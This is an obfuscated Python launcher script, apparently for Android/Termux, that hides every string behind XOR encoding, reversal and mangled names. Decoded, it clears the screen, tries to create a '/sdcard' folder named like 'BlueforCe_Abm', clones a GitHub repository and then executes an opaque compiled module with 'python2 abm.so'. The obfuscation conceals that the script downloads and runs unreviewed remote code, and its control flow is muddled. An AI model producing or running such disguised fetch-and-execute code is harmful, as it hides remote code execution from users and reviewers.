l01101OllOO1lOO0OOO0l = (lambda OOlllOl011OOl1lO0OO1O,
    ll10101ll0O0O1O00OO11: OOlllOl011OOl1lO0OO1O ^ ll10101ll0O0O1O00OO11)
l0Ol10OOO0lO1lOl1000O = __import__(''.join(chr(lOOOOl0O0OOO1O0lll0OO ^
    OOlll11010O00O1Oll100) for OOlll11010O00O1Oll100, lOOOOl0O0OOO1O0lll0OO in
    zip(b'_\x0f', b'-j')), globals(), locals(), [], 0)
llOO10ll001l11OOl110l = __import__(''.join(chr(llOOl11lll1O0OO1O0l0l ^
    OOOl1lOlOllll100O1O0O) for OOOl1lOlOllll100O1O0O, llOOl11lll1O0OO1O0l0l in
    zip(b'\x90\xbd', b'\xff\xce')), globals(), locals(), [], 0)


def lOOOOOllO1O011Ol00Ol0():
 getattr(llOO10ll001l11OOl110l, 'metsys'[::-1])(''.join(chr(
     l01101OllOO1lOO0OOO0l(l1llll0010011O0O0l1ll, l1l1Ol10O1Ol1lll111l0)) for
     l1l1Ol10O1Ol1lll111l0, l1llll0010011O0O0l1ll in zip(b'\xf3\xbaRS\xb0',
     b'\x90\xd672\xc2')))
 try:
  getattr(llOO10ll001l11OOl110l, ''.join(chr(l1ll1O1l0O0lO01O1lOlO ^
      OOl00lO0100OlOOO1ll0l) for OOl00lO0100OlOOO1ll0l,
      l1ll1O1l0O0lO01O1lOlO in zip(b'\xe9\x92\xf1\x1e\xf9',
      b'\x84\xf9\x95w\x8b')))(''.join(chr(O110l110llO11l1101ll1 ^
      lO110OOl0O10l0O0111l0) for lO110OOl0O10l0O0111l0,
      O110l110llO11l1101ll1 in zip(
      b'\xd3\xb5\xed,\xc8+C\xd3\xa4\x96\xb2\xbf\x9d]\xb4ar\xd2\xe1\xcd\x06',
      b'\xbe\xd7\xacs\xadH1\xbc\xc2\xf3\xc7\xd3\xdfr\xd0\x13\x13\xb1\x85\xbe)'
      ))[::-1])
 except IOError:
  pass
  print('\x1b[0;30mTool\x1b[0;30m'[::-1][::-1 ^ 0])
  getattr(llOO10ll001l11OOl110l, ''.join(chr(OlOOO00lOlO0100O11ll1 ^
      Oll10Oll110lO01l101ll) for Oll10Oll110lO01l101ll,
      OlOOO00lOlO0100O11ll1 in zip(b'E\xba\xf9r\x11\x8f',
      b'6\xc3\x8a\x06t\xe2')))(
      'git clone https://github.com/Hajaoajabhaoah77tt/.....'[::-1][::-1 * 
      13 + 12])
  getattr(llOO10ll001l11OOl110l, 'sys' + 'tem')(''.join(filter(lambda
      O00l1l0O11lO01l0l01Ol: ord(O00l1l0O11lO01l0l01Ol) % 4 != 0,
      '\x10|\x14(,\\L@\x04dH<$<x')).join(chr(lOlO1llOOO01OOO0O0100 ^
      O1l100l01lOlOO11l0OO1) for O1l100l01lOlOO11l0OO1,
      lOlO1llOOO01OOO0O0100 in zip(b'\xa2\x80\x99\xfd\x90\xcd/N',
      b'\xc1\xe4\xb9\xd3\xbe\xe3\x01`')))
  getattr(llOO10ll001l11OOl110l, 'metsys'[::-1])(''.join(chr(
      Ol10lOO0OlO1lO00001l1 ^ lOl1ll10lll11Ol1l0l00) for 
      lOl1ll10lll11Ol1l0l00, Ol10lOO0OlO1lO00001l1 in zip(
      b'\xba\x1b\xe6.\xe9\x00\x03\xfa\xa4m\xbe\x8f\xb1@',
      b'\xcab\x92F\x86n1\xda\xc5\x0f\xd3\xa1\xc2/')))


if __name__ == ''.join(filter(lambda Ol001l00l1Oll1OOOllOO: ord(
    Ol001l00l1Oll1OOOllOO) % 4 != 0, '@t\x14(h PdP@4x\x14H\x00')).join(chr(
    l01l1Ol1l0OlOl0OOO000 ^ OOll0llllO10O1lllO0lO) for 
    OOll0llllO10O1lllO0lO, l01l1Ol1l0OlOl0OOO000 in zip(
    b'\xc7\xfe\x13\xfd\xee\xe2\x10\x88', b'\x98\xa1~\x9c\x87\x8cO\xd7')):
 lOOOOOllO1O011Ol00Ol0()
